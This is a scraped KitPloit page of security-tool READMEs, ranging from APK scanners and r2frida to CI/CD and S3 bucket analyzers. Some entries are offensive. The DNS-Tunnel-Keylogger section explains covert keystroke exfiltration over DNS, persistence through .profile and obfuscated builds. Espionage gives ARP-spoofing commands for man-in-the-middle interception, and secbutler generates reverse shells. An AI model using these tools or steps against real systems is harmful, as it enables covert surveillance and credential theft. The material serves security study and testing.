  • 10.0.4.40 splunk.lab

Internal

  • 10.0.5.100 attack.lab
  • 10.0.5.12 dvwa-modsecurity.lab
  • 10.0.5.13 wackopicko.lab

License

This Docker Compose application is released under the MIT License. See the LICENSE file for details.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Espionage - A Linux Packet Sniffing Suite For Automated MiTM Attacks

By: Zion3R β€” April 25th 2024 at 12:30

Espionage is a network packet sniffer that intercepts large amounts of data being passed through an interface. The tool allows users to to run normal and verbose traffic analysis that shows a live feed of traffic, revealing packet direction, protocols, flags, etc. Espionage can also spoof ARP so, all data sent by the target gets redirected through the attacker (MiTM). Espionage supports IPv4, TCP/UDP, ICMP, and HTTP. Espionag e was written in Python 3.8 but it also supports version 3.6. This is the first version of the tool so please contact the developer if you want to help contribute and add more to Espionage. Note: This is not a Scapy wrapper, scapylib only assists with HTTP requests and ARP.


Installation

1: git clone https://www.github.com/josh0xA/Espionage.git
2: cd Espionage
3: sudo python3 -m pip install -r requirments.txt
4: sudo python3 espionage.py --help

Usage

  1. sudo python3 espionage.py --normal --iface wlan0 -f capture_output.pcap
    Command 1 will execute a clean packet sniff and save the output to the pcap file provided. Replace wlan0 with whatever your network interface is.
  2. sudo python3 espionage.py --verbose --iface wlan0 -f capture_output.pcap
    Command 2 will execute a more detailed (verbose) packet sniff and save the output to the pcap file provided.
  3. sudo python3 espionage.py --normal --iface wlan0
    Command 3 will still execute a clean packet sniff however, it will not save the data to a pcap file. Saving the sniff is recommended.
  4. sudo python3 espionage.py --verbose --httpraw --iface wlan0
    Command 4 will execute a verbose packet sniff and will also show raw http/tcp packet data in bytes.
  5. sudo python3 espionage.py --target <target-ip-address> --iface wlan0
    Command 5 will ARP spoof the target ip address and all data being sent will be routed back to the attackers machine (you/localhost).
  6. sudo python3 espionage.py --iface wlan0 --onlyhttp
    Command 6 will only display sniffed packets on port 80 utilizing the HTTP protocol.
  7. sudo python3 espionage.py --iface wlan0 --onlyhttpsecure
    Command 7 will only display sniffed packets on port 443 utilizing the HTTPS (secured) protocol.
  8. sudo python3 espionage.py --iface wlan0 --urlonly
    Command 8 will only sniff and return sniffed urls visited by the victum. (works best with sslstrip).

  9. Press Ctrl+C in-order to stop the packet interception and write the output to file.

Menu

usage: espionage.py [-h] [--version] [-n] [-v] [-url] [-o] [-ohs] [-hr] [-f FILENAME] -i IFACE
[-t TARGET]

optional arguments:
-h, --help show this help message and exit
--version returns the packet sniffers version.
-n, --normal executes a cleaner interception, less sophisticated.
-v, --verbose (recommended) executes a more in-depth packet interception/sniff.
-url, --urlonly only sniffs visited urls using http/https.
-o, --onlyhttp sniffs only tcp/http data, returns urls visited.
-ohs, --onlyhttpsecure
sniffs only https data, (port 443).
-hr, --httpraw displays raw packet data (byte order) recieved or sent on port 80.

(Recommended) arguments for data output (.pcap):
-f FILENAME, --filename FILENAME
name of file to store the output (make extension '.pcap').

(Required) arguments required for execution:
-i IFACE, --iface IFACE
specify network interface (ie. wlan0, eth0, wlan1, etc.)

(ARP Spoofing) required arguments in-order to use the ARP Spoofing utility:
-t TARGET, --target TARGET

A Linux Packet Sniffing Suite for Automated MiTM Attacks (6)

Writeup

A simple medium writeup can be found here:
Click Here For The Official Medium Article

Ethical Notice

The developer of this program, Josh Schiavone, written the following code for educational and ethical purposes only. The data sniffed/intercepted is not to be used for malicous intent. Josh Schiavone is not responsible or liable for misuse of this penetration testing tool. May God bless you all.

License

MIT License
Copyright (c) 2024 Josh Schiavone




☐ β˜† βœ‡ KitPloit - PenTest Tools!

C2-Tracker - Live Feed Of C2 Servers, Tools, And Botnets

By: Zion3R β€” April 24th 2024 at 02:23


Free to use IOC feed for various tools/malware. It started out for just C2 tools but has morphed into tracking infostealers and botnets as well. It uses shodan.io/">Shodan searches to collect the IPs. The most recent collection is always stored in data; the IPs are broken down by tool and there is an all.txt.

The feed should update daily. Actively working on making the backend more reliable


Honorable Mentions

Many of the Shodan queries have been sourced from other CTI researchers:

Huge shoutout to them!

Thanks to BertJanCyber for creating the KQL query for ingesting this feed

And finally, thanks to Y_nexro for creating C2Live in order to visualize the data

What do I track?

Running Locally

If you want to host a private version, put your Shodan API key in an environment variable called SHODAN_API_KEY

echo SHODAN_API_KEY=API_KEY >> ~/.bashrc
bash
python3 -m pip install -r requirements.txt
python3 tracker.py

Contributing

I encourage opening an issue/PR if you know of any additional Shodan searches for identifying adversary infrastructure. I will not set any hard guidelines around what can be submitted, just know, fidelity is paramount (high true/false positive ratio is the focus).

References



☐ β˜† βœ‡ KitPloit - PenTest Tools!

APKDeepLens - Android Security Insights In Full Spectrum

By: Zion3R β€” April 11th 2024 at 12:30


APKDeepLens is a Python based tool designed to scan Android applications (APK files) for security vulnerabilities. It specifically targets the OWASP Top 10 mobile vulnerabilities, providing an easy and efficient way for developers, penetration testers, and security researchers to assess the security posture of Android apps.


Features

APKDeepLens is a Python-based tool that performs various operations on APK files. Its main features include:

  • APK Analysis -> Scans Android application package (APK) files for security vulnerabilities.
  • OWASP Coverage -> Covers OWASP Top 10 vulnerabilities to ensure a comprehensive security assessment.
  • Advanced Detection -> Utilizes custom python code for APK file analysis and vulnerability detection.
  • Sensitive Information Extraction -> Identifies potential security risks by extracting sensitive information from APK files, such as insecure authentication/authorization keys and insecure request protocols.
  • In-depth Analysis -> Detects insecure data storage practices, including data related to the SD card, and highlights the use of insecure request protocols in the code.
  • Intent Filter Exploits -> Pinpoint vulnerabilities by analyzing intent filters extracted from AndroidManifest.xml.
  • Local File Vulnerability Detection -> Safeguard your app by identifying potential mishandlings related to local file operations
  • Report Generation -> Generates detailed and easy-to-understand reports for each scanned APK, providing actionable insights for developers.
  • CI/CD Integration -> Designed for easy integration into CI/CD pipelines, enabling automated security testing in development workflows.
  • User-Friendly Interface -> Color-coded terminal outputs make it easy to distinguish between different types of findings.

Installation

To use APKDeepLens, you'll need to have Python 3.8 or higher installed on your system. You can then install APKDeepLens using the following command:

For Linux

git clone https://github.com/d78ui98/APKDeepLens/tree/main
cd /APKDeepLens
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python APKDeepLens.py --help

For Windows

git clone https://github.com/d78ui98/APKDeepLens/tree/main
cd \APKDeepLens
python3 -m venv venv
.\venv\Scripts\activate
pip install -r .\requirements.txt
python APKDeepLens.py --help

Usage

To simply scan an APK, use the below command. Mention the apk file with -apk argument. Once the scan is complete, a detailed report will be displayed in the console.

python3 APKDeepLens.py -apk file.apk

If you've already extracted the source code and want to provide its path for a faster scan you can use the below command. Mention the source code of the android application with -source parameter.

python3 APKDeepLens.py -apk file.apk -source <source-code-path>

To generate detailed PDF and HTML reports after the scan you can pass -report argument as mentioned below.

python3 APKDeepLens.py -apk file.apk -report

Contributing

We welcome contributions to the APKDeepLens project. If you have a feature request, bug report, or proposal, please open a new issue here.

For those interested in contributing code, please follow the standard GitHub process. We'll review your contributions as quickly as possible :)

Featured at



☐ β˜† βœ‡ KitPloit - PenTest Tools!

R2Frida - Radare2 And Frida Better Together

By: Zion3R β€” March 30th 2024 at 11:30


This is a self-contained plugin for radare2 that allows to instrument remote processes using frida.

The radare project brings a complete toolchain for reverse engineering, providing well maintained functionalities and extend its features with other programming languages and tools.

Frida is a dynamic instrumentation toolkit that makes it easy to inspect and manipulate running processes by injecting your own JavaScript, and optionally also communicate with your scripts.


Features

  • Run unmodified Frida scripts (Use the :. command)
  • Execute snippets in C, Javascript or TypeScript in any process
  • Can attach, spawn or launch in local or remote systems
  • List sections, symbols, exports, protocols, classes, methods
  • Search for values in memory inside the agent or from the host
  • Replace method implementations or create hooks with short commands
  • Load libraries and frameworks in the target process
  • Support Dalvik, Java, ObjC, Swift and C interfaces
  • Manipulate file descriptors and environment variables
  • Send signals to the process, continue, breakpoints
  • The r2frida io plugin is also a filesystem fs and debug backend
  • Automate r2 and frida using r2pipe
  • Read/Write process memory
  • Call functions, syscalls and raw code snippets
  • Connect to frida-server via usb or tcp/ip
  • Enumerate apps and processes
  • Trace registers, arguments of functions
  • Tested on x64, arm32 and arm64 for Linux, Windows, macOS, iOS and Android
  • Doesn't require frida to be installed in the host (no need for frida-tools)
  • Extend the r2frida commands with plugins that run in the agent
  • Change page permissions, patch code and data
  • Resolve symbols by name or address and import them as flags into r2
  • Run r2 commands in the host from the agent
  • Use r2 apis and run r2 commands inside the remote target process.
  • Native breakpoints using the :db api
  • Access remote filesystems using the r_fs api.

Installation

The recommended way to install r2frida is via r2pm:

$ r2pm -ci r2frida

Binary builds that don't require compilation will be soon supported in r2pm and r2env. Meanwhile feel free to download the last builds from the Releases page.

Compilation

Dependencies

  • radare2
  • pkg-config (not required on windows)
  • curl or wget
  • make, gcc
  • npm, nodejs (will be soon removed)

In GNU/Debian you will need to install the following packages:

$ sudo apt install -y make gcc libzip-dev nodejs npm curl pkg-config git

Instructions

$ git clone https://github.com/nowsecure/r2frida.git
$ cd r2frida
$ make
$ make user-install

Windows

  • Install meson and Visual Studio
  • Unzip the latest radare2 release zip in the r2frida root directory
  • Rename it to radare2 (instead of radare2-x.y.z)
  • To make the VS compiler available in PATH (preconfigure.bat)
  • Run configure.bat and then make.bat
  • Copy the b\r2frida.dll into r2 -H R2_USER_PLUGINS

Usage

For testing, use r2 frida://0, as attaching to the pid0 in frida is a special session that runs in local. Now you can run the :? command to get the list of commands available.

$ r2 'frida://?'
r2 frida://[action]/[link]/[device]/[target]
* action = list | apps | attach | spawn | launch
* link = local | usb | remote host:port
* device = '' | host:port | device-id
* target = pid | appname | process-name | program-in-path | abspath
Local:
* frida://? # show this help
* frida:// # list local processes
* frida://0 # attach to frida-helper (no spawn needed)
* frida:///usr/local/bin/rax2 # abspath to spawn
* frida://rax2 # same as above, considering local/bin is in PATH
* frida://spawn/$(program) # spawn a new process in the current system
* frida://attach/(target) # attach to target PID in current host
USB:
* frida://list/usb// # list processes in the first usb device
* frida://apps/usb// # list apps in the first usb device
* frida://attach/usb//12345 # attach to given pid in the first usb device
* frida://spawn/usb//appname # spawn an app in the first resolved usb device
* frida://launch/usb//appname # spawn+resume an app in the first usb device
Remote:
* frida://attach/remote/10.0.0.3:9999/558 # attach to pid 558 on tcp remote frida-server
Environment: (Use the `%` command to change the environment at runtime)
R2FRIDA_SAFE_IO=0|1 # Workaround a Frida bug on Android/thumb
R2FRIDA_DEBUG=0|1 # Used to debug argument parsing behaviour
R2FRIDA_COMPILER_DISABLE=0|1 # Disable the new frida typescript compiler (`:. foo.ts`)
R2FRIDA_AGENT_SCRIPT=[file] # path to file of the r2frida agent

Examples

$ r2 frida://0     # same as frida -p 0, connects to a local session

You can attach, spawn or launch to any program by name or pid, The following line will attach to the first process named rax2 (run rax2 - in another terminal to test this line)

$ r2 frida://rax2  # attach to the first process named `rax2`
$ r2 frida://1234 # attach to the given pid

Using the absolute path of a binary to spawn will spawn the process:

$ r2 frida:///bin/ls
[0x00000000]> :dc # continue the execution of the target program

Also works with arguments:

$ r2 frida://"/bin/ls -al"

For USB debugging iOS/Android apps use these actions. Note that spawn can be replaced with launch or attach, and the process name can be the bundleid or the PID.

$ r2 frida://spawn/usb/         # enumerate devices
$ r2 frida://spawn/usb// # enumerate apps in the first iOS device
$ r2 frida://spawn/usb//Weather # Run the weather app

Commands

These are the most frequent commands, so you must learn them and suffix it with ? to get subcommands help.

:i        # get information of the target (pid, name, home, arch, bits, ..)
.:i* # import the target process details into local r2
:? # show all the available commands
:dm # list maps. Use ':dm|head' and seek to the program base address
:iE # list the exports of the current binary (seek)
:dt fread # trace the 'fread' function
:dt-* # delete all traces

Plugins

r2frida plugins run in the agent side and are registered with the r2frida.pluginRegister API.

See the plugins/ directory for some more example plugin scripts.

[0x00000000]> cat example.js
r2frida.pluginRegister('test', function(name) {
if (name === 'test') {
return function(args) {
console.log('Hello Args From r2frida plugin', args);
return 'Things Happen';
}
}
});
[0x00000000]> :. example.js # load the plugin script

The :. command works like the r2's . command, but runs inside the agent.

:. a.js  # run script which registers a plugin
:. # list plugins
:.-test # unload a plugin by name
:.. a.js # eternalize script (keeps running after detach)

Termux

If you are willing to install and use r2frida natively on Android via Termux, there are some caveats with the library dependencies because of some symbol resolutions. The way to make this work is by extending the LD_LIBRARY_PATH environment to point to the system directory before the termux libdir.

$ LD_LIBRARY_PATH=/system/lib64:$LD_LIBRARY_PATH r2 frida://...

Troubleshooting

Ensure you are using a modern version of r2 (preferibly last release or git).

Run r2 -L | grep frida to verify if the plugin is loaded, if nothing is printed use the R2_DEBUG=1 environment variable to get some debugging messages to find out the reason.

If you have problems compiling r2frida you can use r2env or fetch the release builds from the GitHub releases page, bear in mind that only MAJOR.MINOR version must match, this is r2-5.7.6 can load any plugin compiled on any version between 5.7.0 and 5.7.8.

Design

 +---------+
| radare2 | The radare2 tool, on top of the rest
+---------+
:
+----------+
| io_frida | r2frida io plugin
+----------+
:
+---------+
| frida | Frida host APIs and logic to interact with target
+---------+
:
+-------+
| app | Target process instrumented by Frida with Javascript
+-------+

Credits

This plugin has been developed by pancake aka Sergi Alvarez (the author of radare2) for NowSecure.

I would like to thank Ole AndrΓ© for writing and maintaining Frida as well as being so kind to proactively fix bugs and discuss technical details on anything needed to make this union to work. Kudos



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Noia - Simple Mobile Applications Sandbox File Browser Tool

By: Zion3R β€” March 27th 2024 at 11:30


Noia is a web-based tool whose main aim is to ease the process of browsing mobile applications sandbox and directly previewing SQLite databases, images, and more. Powered by frida.re.

Please note that I'm not a programmer, but I'm probably above the median in code-savyness. Try it out, open an issue if you find any problems. PRs are welcome.


Installation & Usage

npm install -g noia
noia

Features

  • Explore third-party applications files and directories. Noia shows you details including the access permissions, file type and much more.

  • View custom binary files. Directly preview SQLite databases, images, and more.

  • Search application by name.

  • Search files and directories by name.

  • Navigate to a custom directory using the ctrl+g shortcut.

  • Download the application files and directories for further analysis.

  • Basic iOS support

and more


Setup

Desktop requirements:

  • node.js LTS and npm
  • Any decent modern desktop browser

Noia is available on npm, so just type the following command to install it and run it:

npm install -g noia
noia

Device setup:

Noia is powered by frida.re, thus requires Frida to run.

Rooted Device

See: * https://frida.re/docs/android/ * https://frida.re/docs/ios/

Non-rooted Device

  • https://koz.io/using-frida-on-android-without-root/
  • https://github.com/sensepost/objection/wiki/Patching-Android-Applications
  • https://nowsecure.com/blog/2020/01/02/how-to-conduct-jailed-testing-with-frida/

Security Warning

This tool is not secure and may include some security vulnerabilities so make sure to isolate the webpage from potential hackers.

LICENCE

MIT



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Skytrack - Planespotting And Aircraft OSINT Tool Made Using Python

By: Zion3R β€” March 22nd 2024 at 11:30

About

skytrack is a command-line based plane spotting and aircraft OSINT reconnaissanceΒ tool made using Python. It can gather aircraft information using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general purposeΒ reconnaissance.


What is Planespotting & Aircraft OSINT?

Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, aircraft informationΒ gathering and OSINT is a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicy accessible data sources to obtain data about a specific subject β€” in this case planes!

Aircraft Information

  • Tail Number πŸ›«
  • Aircraft Type βš™οΈ
  • ICAO24 Designation πŸ”Ž
  • Manufacturer Details πŸ› 
  • Flight Logs πŸ“„
  • Aircraft Owner ✈️
  • Model πŸ›©
  • Much more!

Usage

To run skytrack on your machine, follow the steps below:

$ git clone https://github.com/ANG13T/skytrack
$ cd skytrack
$ pip install -r requirements.txt
$ python skytrack.py

skytrack works best for Python version 3.

Preview

Features

skytrack features three main functions for aircraft information

gathering and display options. They include the following:

Aircraft Reconnaissance & OSINT

skytrack obtains general information about the aircraft given its tail number or ICAO designator. The tool sources this information using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.

PDF Aircraft Information Report

skytrack also enables you the save the collected aircraft information into a PDF. The PDF includes all the aircraft data in a visual layout for later reference. The PDF report will be entitled "skytrack_report.pdf"

Tail Number to ICAO Converter

There are two standard identification formats for specifying aircraft: Tail Number and ICAO Designation. The tail number (aka N-Number) is an alphanumerical ID starting with the letter "N" used to identify aircraft. The ICAO type designation is a six-character fixed-length ID in the hexadecimal format. Both standards are highly pertinent for aircraft

reconnaissance as they both can be used to search for a specific aircraft in data sources. However, converting them from one format to another can be rather cumbersome as it follows a tricky algorithm. To streamline this process, skytrack includes a standard converter.

Further Explanation

ICAO and Tail Numbers follow a mapping system like the following:

ICAO address N-Number (Tail Number)

a00001 N1

a00002 N1A

a00003 N1AA

You can learn more about aircraft registration numbers [here](https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers)

:warning: Converter only works for USA-registered aircraft

Data Sources & APIs Used

ICAO Aircraft Type Designators Listings

FlightAware

Wikipedia

Aviation Safety Website

Jet Photos Website

OpenSky API

Aviation Weather METAR

Airport Codes Dataset

Contributing

skytrack is open to any contributions. Please fork the repository and make a pull request with the features or fixes you want to implement.

Upcoming

  • Obtain Latest Flown Airports
  • Obtain Airport Information
  • Obtain ATC Frequency Information

Support

If you enjoyed skytrack, please consider becoming a sponsor or donating on buymeacoffee in order to fund my future projects.

To check out my other works, visit my GitHub profile.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

DNS-Tunnel-Keylogger - Keylogging Server And Client That Uses DNS Tunneling/Exfiltration To Transmit Keystrokes

By: Zion3R β€” March 21st 2024 at 11:30


This post-exploitation keylogger will covertly exfiltrate keystrokes to a server.

These tools excel at lightweight exfiltration and persistence, properties which will prevent detection. It uses DNS tunelling/exfiltration to bypass firewalls and avoid detection.


Server

Setup

The server uses python3.

To install dependencies, run python3 -m pip install -r requirements.txt

Starting the Server

To start the server, run python3 main.py

usage: dns exfiltration server [-h] [-p PORT] ip domain

positional arguments:
ip
domain

options:
-h, --help show this help message and exit
-p PORT, --port PORT port to listen on

By default, the server listens on UDP port 53. Use the -p flag to specify a different port.

ip is the IP address of the server. It is used in SOA and NS records, which allow other nameservers to find the server.

domain is the domain to listen for, which should be the domain that the server is authoritative for.

Registrar

On the registrar, you want to change your domain's namespace to custom DNS.

Point them to two domains, ns1.example.com and ns2.example.com.

Add records that make point the namespace domains to your exfiltration server's IP address.

This is the same as setting glue records.

Client

Linux

The Linux keylogger is two bash scripts. connection.sh is used by the logger.sh script to send the keystrokes to the server. If you want to manually send data, such as a file, you can pipe data to the connection.sh script. It will automatically establish a connection and send the data.

logger.sh

# Usage: logger.sh [-options] domain
# Positional Arguments:
# domain: the domain to send data to
# Options:
# -p path: give path to log file to listen to
# -l: run the logger with warnings and errors printed

To start the keylogger, run the command ./logger.sh [domain] && exit. This will silently start the keylogger, and any inputs typed will be sent. The && exit at the end will cause the shell to close on exit. Without it, exiting will bring you back to the non-keylogged shell. Remove the &> /dev/null to display error messages.

The -p option will specify the location of the temporary log file where all the inputs are sent to. By default, this is /tmp/.

The -l option will show warnings and errors. Can be useful for debugging.

logger.sh and connection.sh must be in the same directory for the keylogger to work. If you want persistance, you can add the command to .profile to start on every new interactive shell.

connection.sh

Usage: command [-options] domain
Positional Arguments:
domain: the domain to send data to
Options:
-n: number of characters to store before sending a packet

Windows

Build

To build keylogging program, run make in the windows directory. To build with reduced size and some amount of obfuscation, make the production target. This will create the build directory for you and output to a file named logger.exe in the build directory.

make production domain=example.com

You can also choose to build the program with debugging by making the debug target.

make debug domain=example.com

For both targets, you will need to specify the domain the server is listening for.

Sending Test Requests

You can use dig to send requests to the server:

dig @127.0.0.1 a.1.1.1.example.com A +short send a connection request to a server on localhost.

dig @127.0.0.1 b.1.1.54686520717569636B2062726F776E20666F782E1B.example.com A +short send a test message to localhost.

Replace example.com with the domain the server is listening for.

Protocol

Starting a Connection

A record requests starting with a indicate the start of a "connection." When the server receives them, it will respond with a fake non-reserved IP address where the last octet contains the id of the client.

The following is the format to follow for starting a connection: a.1.1.1.[sld].[tld].

The server will respond with an IP address in following format: 123.123.123.[id]

Concurrent connections cannot exceed 254, and clients are never considered "disconnected."

Exfiltrating Data

A record requests starting with b indicate exfiltrated data being sent to the server.

The following is the format to follow for sending data after establishing a connection: b.[packet #].[id].[data].[sld].[tld].

The server will respond with [code].123.123.123

id is the id that was established on connection. Data is sent as ASCII encoded in hex.

code is one of the codes described below.

Response Codes

200: OK

If the client sends a request that is processed normally, the server will respond with code 200.

201: Malformed Record Requests

If the client sends an malformed record request, the server will respond with code 201.

202: Non-Existant Connections

If the client sends a data packet with an id greater than the # of connections, the server will respond with code 202.

203: Out of Order Packets

If the client sends a packet with a packet id that doesn't match what is expected, the server will respond with code 203. Clients and servers should reset their packet numbers to 0. Then the client can resend the packet with the new packet id.

204 Reached Max Connection

If the client attempts to create a connection when the max has reached, the server will respond with code 204.

Dropped Packets

Clients should rely on responses as acknowledgements of received packets. If they do not receive a response, they should resend the same payload.

Side Notes

Linux

Log File

The log file containing user inputs contains ASCII control characters, such as backspace, delete, and carriage return. If you print the contents using something like cat, you should select the appropriate option to print ASCII control characters, such as -v for cat, or open it in a text-editor.

Non-Interactive Shells

The keylogger relies on script, so the keylogger won't run in non-interactive shells.

Windows

Repeated Requests

For some reason, the Windows Dns_Query_A always sends duplicate requests. The server will process it fine because it discards repeated packets.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

MrHandler - Linux Incident Response Reporting

By: Zion3R β€” February 17th 2024 at 23:30

Β 


MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents.



π—œπ—‘π—¦π—§π—”π—Ÿπ—Ÿπ—”π—§π—œπ—’π—‘ π—œπ—‘π—¦π—§π—₯π—¨π—–π—§π—œπ—’π—‘π—¦
  $ pip3 install colorama
$ pip3 install paramiko
$ git clone https://github.com/emrekybs/BlueFish.git
$ cd MrHandler
$ chmod +x MrHandler.py
$ python3 MrHandler.py


Report



☐ β˜† βœ‡ KitPloit - PenTest Tools!

WEB-Wordlist-Generator - Creates Related Wordlists After Scanning Your Web Applications

By: Zion3R β€” February 15th 2024 at 11:30


WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.


Done
  • [x] Scan Static Files.
  • [ ] Scan Metadata Of Public Documents (pdf,doc,xls,ppt,docx,pptx,xlsx etc.)
  • [ ] Create a New Associated Wordlist with the Wordlist Given as a Parameter.

Installation

From Git
git clone https://github.com/OsmanKandemir/web-wordlist-generator.git
cd web-wordlist-generator && pip3 install -r requirements.txt
python3 generator.py -d target-web.com

From Dockerfile

You can run this application on a container after build a Dockerfile.

docker build -t webwordlistgenerator .
docker run webwordlistgenerator -d target-web.com -o

From DockerHub

You can run this application on a container after pulling from DockerHub.

docker pull osmankandemir/webwordlistgenerator:v1.0
docker run osmankandemir/webwordlistgenerator:v1.0 -d target-web.com -o

Usage
-d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Multi or Single Targets. --domains target-web1.com target-web2.com
-p PROXY, --proxy PROXY Use HTTP proxy. --proxy 0.0.0.0:8080
-a AGENT, --agent AGENT Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
-o PRINT, --print PRINT Use Print outputs on terminal screen.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Secbutler - The Perfect Butler For Pentesters, Bug-Bounty Hunters And Security Researchers

By: Zion3R β€” February 14th 2024 at 11:30

Essential utilities for pentester, bug-bounty hunters and security researchers

secbutler is a utility tool made for pentesters, bug-bounty hunters and security researchers that contains all the most used and tedious stuff commonly used while performing cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists and so forth).

The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!


Features
  • Generate a reverse shell command
  • Obtain proxy
  • Download & deploy common payloads
  • Obtain reverse shell listener command
  • Generate bash install script for common tools
  • Generate bash download script for Wordlists
  • Read common cheatsheets and payloads

Usage
secbutler -h

This will display the help for the tool

                   __          __  __
________ _____/ /_ __ __/ /_/ /__ _____
/ ___/ _ \/ ___/ __ \/ / / / __/ / _ \/ ___/
(__ ) __/ /__/ /_/ / /_/ / /_/ / __/ /
/____/\___/\___/_.___/\__,_/\__/_/\___/_/

v0.1.9 - https://github.com/groundsec/secbutler

Essential utilities for pentester, bug-bounty hunters and security researchers

Usage:
secbutler [flags]
secbutler [command]

Available Commands:
cheatsheet Read common cheatsheets & payloads
help Help about any command
listener Obtain the command to start a reverse shell listener
payloads Obtain and serve common payloads
proxy Obtain a random proxy from FreeProxy
revshell Obtain the command for a reverse shell
tools Generate a install script for the most common cybersecurity tools
version Print the current version
wordlists Generate a download script for the most common wordlists

Flags:
-h, --help help for secbutler

Use "secbutler [command] --help" for more information about a command.



Installation

Run the following command to install the latest version:

go install github.com/groundsec/secbutler@latest

Or you can simply grab an executable from the Releases page.


License

secbutler is made with πŸ–€ by the GroundSec team and released under the MIT LICENSE.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

BucketLoot - An Automated S3-compatible Bucket Inspector

By: Zion3R β€” January 29th 2024 at 11:30


BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.

BucketLoot comes with a guest mode by default, which means a user doesn't needs to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response and if the storage bucket contains more than 1000 entries which the user would like to run the scanner on, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.

Features

Secret Scanning

Scans for over 80+ unique RegEx signatures that can help in uncovering secret exposures tagged with their severity from the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!

Sensitive File Checks

Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with a 80+ unique regEx signatures list in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.

Dig Mode

Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from response body for scanning.

Asset Extraction

Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, enabling you to have a chance of discovering hidden endpoints, thus giving you an edge over the other traditional recon tools.

Searching

The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.

To know more about our Attack Surface Management platform, check out NVADR.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Raven - CI/CD Security Analyzer

By: Zion3R β€” January 28th 2024 at 11:30


RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.

With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:

We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.


What is Raven

The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:

  • Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
  • Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
  • Query Library: We created a library of pre-defined queries based on research conducted by the community.
  • Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.

Possible usages for Raven:

  • Scanner for your own organization's security
  • Scanning specified organizations for bug bounty purposes
  • Scan everything and report issues found to save the internet
  • Research and learning purposes

This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.

Why Raven

In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear – the model in which security is delegated to developers has failed. This has been proven several times in our previous content:

  • A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
  • We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
  • We detailed a completely different attack vector, 3rd party integration risks, the most popular project on GitHub, and thousands more.
  • Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat – an artifact poisoning attack.
  • Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.

Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality – each exploitation can impact millions of victims.

It was for these reasons that Raven was created, a framework for CI/CD security analysis workflows (and GitHub Actions as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.

Setup && Run

To get started with Raven, follow these installation instructions:

Step 1: Install the Raven package

pip3 install raven-cycode

Step 2: Setup a local Redis server and Neo4j database

docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1

Another way to setup the environment is by running our provided docker compose file:

git clone https://github.com/CycodeLabs/raven.git
cd raven
make setup

Step 3: Run Raven Downloader

Org mode:

